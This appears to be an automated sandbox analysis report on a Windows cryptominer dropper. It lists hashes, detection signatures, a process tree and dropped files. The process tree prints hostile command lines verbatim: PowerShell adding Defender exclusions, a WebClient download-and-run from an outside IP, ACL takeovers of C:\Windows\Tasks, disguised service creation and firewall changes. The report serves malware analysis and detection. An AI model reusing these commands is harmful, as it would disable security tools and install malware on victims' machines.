Analysis
-
max time kernel
141s -
max time network
151s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
13-05-2022 05:00
Static task
static1
Behavioral task
behavioral1
Sample
c671c024595fbae1bcb523930b41952a.exe
Resource
win7-20220414-en
General
-
Target
c671c024595fbae1bcb523930b41952a.exe
-
Size
6.7MB
-
MD5
c671c024595fbae1bcb523930b41952a
-
SHA1
af16bda06ebf490087aac1e444e25017e180c7d4
-
SHA256
39b66a47affa0edde59d74760fc17de28c0d3cbabe7469d382a721ea91b5c123
-
SHA512
fb1d9e0488eb247c54b86a0fbb7f1929d6ead0de3502d44e5db701aff3b3df0d7b312939e02bb89790006ea4337dc63b973ce5a2971e132a4188d003ddc95a3b
Malware Config
Extracted
http://45.81.224.130/any.exe
Signatures
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
XMRig Miner Payload 3 IoCs
Processes:
resource yara_rule \Windows\Tasks\ApplicationsFrameHost.exe xmrig C:\Windows\Tasks\ApplicationsFrameHost.exe xmrig C:\Windows\Tasks\ApplicationsFrameHost.exe xmrig -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 4 2040 powershell.exe -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 13 IoCs
Processes:
migrate.exeWmiic.exeWmiic.exeWmiic.exeIntelConfigService.exeWrap.exeApplicationsFrameHost.exeSuperfetch.exeMSTask.exe~Ma4650.exeany.exewininit.exepid process 864 migrate.exe 1804 Wmiic.exe 848 Wmiic.exe 464 820 Wmiic.exe 1316 IntelConfigService.exe 1700 Wrap.exe 1728 ApplicationsFrameHost.exe 1060 Superfetch.exe 1428 MSTask.exe 756 ~Ma4650.exe 1196 any.exe 776 wininit.exe -
Modifies Windows Firewall 1 TTPs
-
Possible privilege escalation attempt 18 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 1496 icacls.exe 844 icacls.exe 1776 icacls.exe 2040 icacls.exe 1292 icacls.exe 1636 icacls.exe 1644 icacls.exe 1556 icacls.exe 1916 icacls.exe 948 icacls.exe 1532 icacls.exe 972 takeown.exe 1932 icacls.exe 2016 icacls.exe 1760 icacls.exe 584 icacls.exe 604 icacls.exe 1960 icacls.exe -
Loads dropped DLL 18 IoCs
Processes:
cmd.execmd.exeWmiic.exeIntelConfigService.execmd.exeMSTask.exe~Ma4650.exepid process 2000 cmd.exe 1660 cmd.exe 1660 cmd.exe 1260 1660 cmd.exe 1636 820 Wmiic.exe 1316 IntelConfigService.exe 1880 cmd.exe 1316 IntelConfigService.exe 1428 MSTask.exe 1428 MSTask.exe 1428 MSTask.exe 1428 MSTask.exe 756 ~Ma4650.exe 756 ~Ma4650.exe 756 ~Ma4650.exe 2000 cmd.exe -
Modifies file permissions 1 TTPs 18 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 1496 icacls.exe 844 icacls.exe 2016 icacls.exe 1532 icacls.exe 1960 icacls.exe 1760 icacls.exe 1556 icacls.exe 1916 icacls.exe 604 icacls.exe 948 icacls.exe 584 icacls.exe 972 takeown.exe 1932 icacls.exe 1644 icacls.exe 1776 icacls.exe 2040 icacls.exe 1292 icacls.exe 1636 icacls.exe -
AutoIT Executable 6 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule \Windows\Tasks\IntelConfigService.exe autoit_exe C:\Windows\Tasks\IntelConfigService.exe autoit_exe C:\windows\tasks\IntelConfigService.exe autoit_exe C:\Windows\Tasks\Superfetch.exe autoit_exe \Windows\Tasks\Superfetch.exe autoit_exe C:\Windows\Tasks\Superfetch.exe autoit_exe -
Drops file in Windows directory 29 IoCs
Processes:
migrate.exeany.exepowershell.exeIntelConfigService.exeApplicationsFrameHost.exedescription ioc process File opened for modification C:\Windows\Tasks\MSTask.exe migrate.exe File opened for modification C:\Windows\Tasks\Wrap.exe migrate.exe File created C:\Windows\Migration\__tmp_rar_sfx_access_check_7105861 any.exe File created C:\Windows\Tasks\run.bat migrate.exe File opened for modification C:\Windows\Tasks\Wmiic.exe migrate.exe File opened for modification C:\Windows\Migration\wininit.exe any.exe File created C:\Windows\Tasks\MSTask.exe migrate.exe File created C:\Windows\Tasks\WinRing0x64.sys migrate.exe File created C:\Windows\Tasks\ApplicationsFrameHost.exe migrate.exe File created C:\Windows\Tasks\__tmp_rar_sfx_access_check_7088919 migrate.exe File created C:\Windows\Tasks\config.json migrate.exe File created C:\Windows\Tasks\IntelConfigService.exe migrate.exe File created C:\Windows\Tasks\Superfetch.exe migrate.exe File opened for modification C:\Windows\Tasks\WinRing0x64.sys migrate.exe File created C:\Windows\Tasks\Wrap.exe migrate.exe File opened for modification C:\Windows\Tasks\IntelConfigService.exe migrate.exe File created C:\Windows\Migration\system.conf any.exe File created C:\Windows\Migration\wininit.exe any.exe File opened for modification C:\Windows\Tasks\ApplicationsFrameHost.exe migrate.exe File opened for modification C:\Windows\Migration\system.conf any.exe File opened for modification C:\Windows\Migration\any.bat any.exe File opened for modification C:\Windows\Tasks\config.json migrate.exe File opened for modification C:\Windows\Tasks\Superfetch.exe migrate.exe File created C:\Windows\Tasks\Wmiic.exe migrate.exe File opened for modification C:\Windows\Tasks\run.bat migrate.exe File created \??\c:\windows\migration\any.exe powershell.exe File opened for modification C:\Windows\Tasks IntelConfigService.exe File opened for modification C:\Windows\Tasks\config.json ApplicationsFrameHost.exe File created C:\Windows\Migration\any.bat any.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Delays execution with timeout.exe 9 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exepid process 2044 timeout.exe 844 timeout.exe 976 timeout.exe 844 timeout.exe 280 timeout.exe 472 timeout.exe 1512 timeout.exe 1920 timeout.exe 1624 timeout.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
Processes:
tasklist.exetasklist.exepid process 624 tasklist.exe 1556 tasklist.exe -
Processes:
~Ma4650.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION ~Ma4650.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\MacroWebExplorer.exe = "11001" ~Ma4650.exe -
Modifies data under HKEY_USERS 17 IoCs
Processes:
~Ma4650.exeMSTask.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION ~Ma4650.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE ~Ma4650.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer ~Ma4650.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\MacroWebExplorer.exe = "11001" ~Ma4650.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft ~Ma4650.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\MacroWebExplorer.exe = "11001" ~Ma4650.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" MSTask.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" MSTask.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl ~Ma4650.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION ~Ma4650.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl ~Ma4650.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Wow6432Node ~Ma4650.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN ~Ma4650.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer ~Ma4650.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\MAIN ~Ma4650.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ MSTask.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Wow6432Node\Microsoft ~Ma4650.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exeIntelConfigService.exeSuperfetch.exe~Ma4650.exepid process 1968 powershell.exe 1804 powershell.exe 2040 powershell.exe 1316 IntelConfigService.exe 1316 IntelConfigService.exe 1316 IntelConfigService.exe 1316 IntelConfigService.exe 1316 IntelConfigService.exe 1316 IntelConfigService.exe 1316 IntelConfigService.exe 1316 IntelConfigService.exe 1316 IntelConfigService.exe 1316 IntelConfigService.exe 1316 IntelConfigService.exe 1316 IntelConfigService.exe 1316 IntelConfigService.exe 1316 IntelConfigService.exe 1316 IntelConfigService.exe 1316 IntelConfigService.exe 1316 IntelConfigService.exe 1316 IntelConfigService.exe 1316 IntelConfigService.exe 1316 IntelConfigService.exe 1316 IntelConfigService.exe 1316 IntelConfigService.exe 1316 IntelConfigService.exe 1316 IntelConfigService.exe 1316 IntelConfigService.exe 1316 IntelConfigService.exe 1316 IntelConfigService.exe 1316 IntelConfigService.exe 1316 IntelConfigService.exe 1316 IntelConfigService.exe 1316 IntelConfigService.exe 1316 IntelConfigService.exe 1316 IntelConfigService.exe 1316 IntelConfigService.exe 1316 IntelConfigService.exe 1316 IntelConfigService.exe 1316 IntelConfigService.exe 1060 Superfetch.exe 756 ~Ma4650.exe 756 ~Ma4650.exe 1316 IntelConfigService.exe 1316 IntelConfigService.exe 1316 IntelConfigService.exe 1316 IntelConfigService.exe 1316 IntelConfigService.exe 1316 IntelConfigService.exe 1316 IntelConfigService.exe 1316 IntelConfigService.exe 1316 IntelConfigService.exe 1316 IntelConfigService.exe 1316 IntelConfigService.exe 1316 IntelConfigService.exe 1060 Superfetch.exe 1316 IntelConfigService.exe 1316 IntelConfigService.exe 1316 IntelConfigService.exe 1316 IntelConfigService.exe 1316 IntelConfigService.exe 1316 IntelConfigService.exe 1316 IntelConfigService.exe 1316 IntelConfigService.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
~Ma4650.exepid process 756 ~Ma4650.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 464 -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
powershell.exepowershell.exetasklist.exepowershell.exeApplicationsFrameHost.exetasklist.exedescription pid process Token: SeDebugPrivilege 1968 powershell.exe Token: SeDebugPrivilege 1804 powershell.exe Token: SeDebugPrivilege 624 tasklist.exe Token: SeDebugPrivilege 2040 powershell.exe Token: SeLockMemoryPrivilege 1728 ApplicationsFrameHost.exe Token: SeDebugPrivilege 1556 tasklist.exe -
Suspicious use of FindShellTrayWindow 7 IoCs
Processes:
IntelConfigService.exeSuperfetch.exeApplicationsFrameHost.exepid process 1316 IntelConfigService.exe 1316 IntelConfigService.exe 1316 IntelConfigService.exe 1060 Superfetch.exe 1060 Superfetch.exe 1060 Superfetch.exe 1728 ApplicationsFrameHost.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
~Ma4650.exepid process 756 ~Ma4650.exe 756 ~Ma4650.exe 756 ~Ma4650.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
c671c024595fbae1bcb523930b41952a.execmd.execmd.exedescription pid process target process PID 1160 wrote to memory of 1968 1160 c671c024595fbae1bcb523930b41952a.exe powershell.exe PID 1160 wrote to memory of 1968 1160 c671c024595fbae1bcb523930b41952a.exe powershell.exe PID 1160 wrote to memory of 1968 1160 c671c024595fbae1bcb523930b41952a.exe powershell.exe PID 1160 wrote to memory of 1968 1160 c671c024595fbae1bcb523930b41952a.exe powershell.exe PID 1160 wrote to memory of 1996 1160 c671c024595fbae1bcb523930b41952a.exe cmd.exe PID 1160 wrote to memory of 1996 1160 c671c024595fbae1bcb523930b41952a.exe cmd.exe PID 1160 wrote to memory of 1996 1160 c671c024595fbae1bcb523930b41952a.exe cmd.exe PID 1160 wrote to memory of 1996 1160 c671c024595fbae1bcb523930b41952a.exe cmd.exe PID 1996 wrote to memory of 2000 1996 cmd.exe cmd.exe PID 1996 wrote to memory of 2000 1996 cmd.exe cmd.exe PID 1996 wrote to memory of 2000 1996 cmd.exe cmd.exe PID 1996 wrote to memory of 2000 1996 cmd.exe cmd.exe PID 2000 wrote to memory of 776 2000 cmd.exe chcp.com PID 2000 wrote to memory of 776 2000 cmd.exe chcp.com PID 2000 wrote to memory of 776 2000 cmd.exe chcp.com PID 2000 wrote to memory of 776 2000 cmd.exe chcp.com PID 2000 wrote to memory of 1804 2000 cmd.exe powershell.exe PID 2000 wrote to memory of 1804 2000 cmd.exe powershell.exe PID 2000 wrote to memory of 1804 2000 cmd.exe powershell.exe PID 2000 wrote to memory of 1804 2000 cmd.exe powershell.exe PID 2000 wrote to memory of 624 2000 cmd.exe tasklist.exe PID 2000 wrote to memory of 624 2000 cmd.exe tasklist.exe PID 2000 wrote to memory of 624 2000 cmd.exe tasklist.exe PID 2000 wrote to memory of 624 2000 cmd.exe tasklist.exe PID 2000 wrote to memory of 1196 2000 cmd.exe find.exe PID 2000 wrote to memory of 1196 2000 cmd.exe find.exe PID 2000 wrote to memory of 1196 2000 cmd.exe find.exe PID 2000 wrote to memory of 1196 2000 cmd.exe find.exe PID 2000 wrote to memory of 972 2000 cmd.exe takeown.exe PID 2000 wrote to memory of 972 2000 cmd.exe takeown.exe PID 2000 wrote to memory of 972 2000 cmd.exe takeown.exe PID 2000 wrote to memory of 972 2000 cmd.exe takeown.exe PID 2000 wrote to memory of 1920 2000 cmd.exe timeout.exe PID 2000 wrote to memory of 1920 2000 cmd.exe timeout.exe PID 2000 wrote to memory of 1920 2000 cmd.exe timeout.exe PID 2000 wrote to memory of 1920 2000 cmd.exe timeout.exe PID 2000 wrote to memory of 2040 2000 cmd.exe icacls.exe PID 2000 wrote to memory of 2040 2000 cmd.exe icacls.exe PID 2000 wrote to memory of 2040 2000 cmd.exe icacls.exe PID 2000 wrote to memory of 2040 2000 cmd.exe icacls.exe PID 2000 wrote to memory of 1292 2000 cmd.exe icacls.exe PID 2000 wrote to memory of 1292 2000 cmd.exe icacls.exe PID 2000 wrote to memory of 1292 2000 cmd.exe icacls.exe PID 2000 wrote to memory of 1292 2000 cmd.exe icacls.exe PID 2000 wrote to memory of 1932 2000 cmd.exe icacls.exe PID 2000 wrote to memory of 1932 2000 cmd.exe icacls.exe PID 2000 wrote to memory of 1932 2000 cmd.exe icacls.exe PID 2000 wrote to memory of 1932 2000 cmd.exe icacls.exe PID 2000 wrote to memory of 1496 2000 cmd.exe icacls.exe PID 2000 wrote to memory of 1496 2000 cmd.exe icacls.exe PID 2000 wrote to memory of 1496 2000 cmd.exe icacls.exe PID 2000 wrote to memory of 1496 2000 cmd.exe icacls.exe PID 2000 wrote to memory of 844 2000 cmd.exe icacls.exe PID 2000 wrote to memory of 844 2000 cmd.exe icacls.exe PID 2000 wrote to memory of 844 2000 cmd.exe icacls.exe PID 2000 wrote to memory of 844 2000 cmd.exe icacls.exe PID 2000 wrote to memory of 1636 2000 cmd.exe icacls.exe PID 2000 wrote to memory of 1636 2000 cmd.exe icacls.exe PID 2000 wrote to memory of 1636 2000 cmd.exe icacls.exe PID 2000 wrote to memory of 1636 2000 cmd.exe icacls.exe PID 2000 wrote to memory of 1644 2000 cmd.exe icacls.exe PID 2000 wrote to memory of 1644 2000 cmd.exe icacls.exe PID 2000 wrote to memory of 1644 2000 cmd.exe icacls.exe PID 2000 wrote to memory of 1644 2000 cmd.exe icacls.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\c671c024595fbae1bcb523930b41952a.exe"C:\Users\Admin\AppData\Local\Temp\c671c024595fbae1bcb523930b41952a.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\migration\ , c:\users\kbtgt\desktop\ , C:\Windows\tasks\ , C:\Windows\ , C:\Windows\Logs\ , C:\Windows\SysWOW64\ , C:\Windows\System32\WindowsPowerShell\v1.0\ , C:\ProgramData\2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\programdata\ru.bat" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "c:\programdata\st.bat"3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\chcp.comchcp 650014⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath c:\windows\migration\ , c:\users\kbtgt\desktop\ , C:\Windows\tasks\ , C:\Windows\ , C:\Windows\Logs\ , C:\Windows\SysWOW64\ , C:\Windows\System32\WindowsPowerShell\v1.0\ , C:\ProgramData\4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "IMAGENAME eq Superfetch.exe"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\find.exefind /I /N "Superfetch.exe"4⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f c:\windows\tasks4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 3 /NOBREAK4⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Tasks" /inheritance:e /grant "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Tasks" /inheritance:e /grant "SYSTEM:(R,REA,RA,RD)"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Tasks" /inheritance:e /grant "Administrators:(R,REA,RA,RD)"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Tasks" /inheritance:e /grant "Users:(R,REA,RA,RD)"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Tasks" /inheritance:e /grant "Admin:(R,REA,RA,RD)"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Tasks" /inheritance:e /grant "Admin:(R,REA,RA,RD)"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Tasks" /inheritance:e /grant "EVERYONE:(R,REA,RA,RD)"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 3 /NOBREAK4⤵
- Delays execution with timeout.exe
-
\??\c:\programdata\migrate.exec:\programdata\migrate.exe -p44324⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\System32\icacls.exe" "c:\windows\tasks\" /inheritance:e /grant "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)"5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\System32\icacls.exe" "c:\windows\tasks\" /inheritance:e /grant "SYSTEM:(R,REA,RA,RD)"5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\System32\icacls.exe" "c:\windows\tasks\" /inheritance:e /grant "Administrators:(R,REA,RA,RD)"5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\System32\icacls.exe" "c:\windows\tasks\" /inheritance:e /grant "Users:(R,REA,RA,RD)"5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\System32\icacls.exe" "c:\windows\tasks\" /inheritance:e /grant "Admin:(R,REA,RA,RD)"5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\System32\icacls.exe" "c:\windows\tasks\" /inheritance:e /grant "%domain%Admin:(R,REA,RA,RD)"5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\System32\icacls.exe" "c:\windows\tasks\" /inheritance:e /grant "EVERYONE:(R,REA,RA,RD)"5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\windows\tasks\run.bat" "5⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 1 /NOBREAK6⤵
- Delays execution with timeout.exe
-
C:\windows\tasks\Wmiic.exe"C:\windows\tasks\wmiic.exe" install WMService IntelConfigService.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 1 /NOBREAK6⤵
- Delays execution with timeout.exe
-
C:\windows\tasks\Wmiic.exe"C:\windows\tasks\wmiic" start WMService6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 2 /NOBREAK6⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\net.exenet start WMService6⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start WMService7⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="block vilnerabliti" dir=in protocol=TCP localport=88 action=block6⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set allprofiles state on6⤵
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 3 /NOBREAK4⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "(new-object System.Net.WebClient).DownloadFile('http://45.81.224.130/any.exe','c:\windows\migration\any.exe')"4⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 3 /NOBREAK4⤵
- Delays execution with timeout.exe
-
\??\c:\windows\migration\any.exec:\windows\migration\any.exe4⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\windows\migration\any.bat" "5⤵
-
C:\Windows\SysWOW64\sc.exeSc create TaskSc binPath="C:\programdata\wininit.exe --service" DisplayName="Task Schedubler" type=own start=auto6⤵
-
C:\Windows\SysWOW64\sc.exeSc create TaskSc binPath= "C:\programdata\wininit.exe --service" DisplayName= "Task Schedubler" type= own start= auto6⤵
-
C:\Windows\SysWOW64\net.exenet start TaskSc6⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start TaskSc7⤵
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 15 /NOBREAK6⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\net.exenet stop TaskSc6⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TaskSc7⤵
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 10 /NOBREAK4⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "IMAGENAME eq Superfetch.exe"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\find.exefind /I /N "Superfetch.exe"4⤵
-
C:\windows\tasks\Wmiic.exeC:\windows\tasks\Wmiic.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\windows\tasks\IntelConfigService.exe"IntelConfigService.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
-
C:\Windows\Tasks\Wrap.exeC:\Windows\Tasks\Wrap.exe3⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Windows\Tasks\ApplicationsFrameHost.exe" --daemonized4⤵
- Loads dropped DLL
-
C:\Windows\Tasks\ApplicationsFrameHost.exeC:\Windows\Tasks\ApplicationsFrameHost.exe --daemonized5⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\Tasks /deny "%username%:(R,REA,RA,RD)"3⤵
-
C:\Windows\system32\icacls.exeicacls C:\Windows\Tasks /deny "WYZSGDWS$:(R,REA,RA,RD)"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\Tasks /deny "Users:(R,REA,RA,RD)"3⤵
-
C:\Windows\system32\icacls.exeicacls C:\Windows\Tasks /deny "Users:(R,REA,RA,RD)"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\Tasks /deny "Administrators:(R,REA,RA,RD))"3⤵
-
C:\Windows\system32\icacls.exeicacls C:\Windows\Tasks /deny "Administrators:(R,REA,RA,RD))"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\Tasks\Superfetch.exeC:\Windows\Tasks\Superfetch.exe3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
-
C:\Windows\Tasks\MSTask.exeC:\Windows\Tasks\MSTask.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\~Mp49ED.tmp\~Ma4650.exe"C:\Windows\TEMP\~Mp49ED.tmp\~Ma4650.exe" /p"C:\Windows\Tasks\MSTask.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies Internet Explorer settings
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
C:\programdata\wininit.exeC:\programdata\wininit.exe --service1⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\migrate.exeFilesize
6.6MB
MD527216b55a4915b7b0a845367bfe7be2b
SHA16e4599d5f5d981079902ac44dc002257af0f9f97
SHA25670df9144efd8eb4aac981ea0f4c2b71aa6e3165c93a1a1a17465c95a9eefc2d7
SHA5126b0895b7d84d0b706bf5bd6a3396e65f591d5de6291307805ab897f89ce0bb4fe835864d43cc8ac15c54494f218a2971ec13e589cc50c1ee9e7b04d32d2d9e00
-
C:\ProgramData\wininit.exeFilesize
3.0MB
MD55eb90fbd6a3a7717813147268893adb3
SHA14ee216a39f727f01c08ccbac3d7d756fa35369da
SHA2567cf373ee6f3c51395f32c24ada5ee4166ceeee295f8a701ab47531c63c1030fa
SHA5120aee3ecf0517b2545b79a38ce4ae789753eb68d818d115991c2bfa7c857bab3a964f02e538bd6ef3a4000fafafd2ca9cb60ff6fc4edca09eec673514ce78618a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msFilesize
7KB
MD5750c3aaa98f4d52c542fa11ec48b76b2
SHA1a8a22493495e7400818dd3914f3cb9b89e47e64f
SHA2566712879ffa111bfbf0df2c3ad516022f548c2abd93f67d450717fd0cd403e4d3
SHA512e32af9b769cac08febcb66196d0676cbaabda28f8278e30b52aeb216fb2da9e8ec5a9f5f35875a5887c38ca28100c71795384a5e821c6bd46d4d464d15b26dff
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msFilesize
7KB
MD54916f1337d20d5bd877f025e83e38821
SHA1b9306acacedf9bb7f3b82f2a84cc962a85fd08de
SHA256e950a8777a2e353c31aaa749e7d9c2ad05c5125033b5690248243f54d3847f47
SHA512bbe3be7eacc66670480725e80d63672a7dbb610927fe4e3b88b1c138321aed0d494946bd92d4d6992123f1f481d306dd52305412af396cdbb71d4f8c7e4b6047
-
